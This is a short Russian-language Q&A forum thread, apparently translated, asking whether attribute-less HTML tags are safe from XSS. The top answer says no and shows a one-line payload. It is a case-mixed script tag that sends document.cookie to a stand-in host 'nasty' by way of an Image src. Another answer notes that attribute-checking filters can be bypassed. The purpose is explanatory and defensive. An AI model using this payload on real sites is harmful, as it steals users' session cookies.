XSS безопасность HTML-тегов без атрибутов - PullRequest
0 голосов
/ 26 мая 2010

Безопасны ли теги HTML XSS, если они не имеют атрибутов?

Ответы [ 3 ]

5 голосов
/ 26 мая 2010

Нет.

<ScrIPT>(new Image).src = 'http://nasty/log?s=' + document.cookie;</SCRipT>
2 голосов
/ 26 мая 2010

Моя позиция здесь ... как вы собираетесь обнаружить, что у них нет атрибутов? Можно сгенерировать специальный HTML-код, который выполняет Javascript в браузере и обходить фильтры, проверяя атрибуты.

Посмотрите на эту презентацию http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf

В любом случае, если вы хотите получить ответ да / нет, мой ответ НЕТ:)

2 голосов
/ 26 мая 2010

Что касается и

Добро пожаловать на сайт PullRequest, где вы можете задавать вопросы и получать ответы от других членов сообщества.
...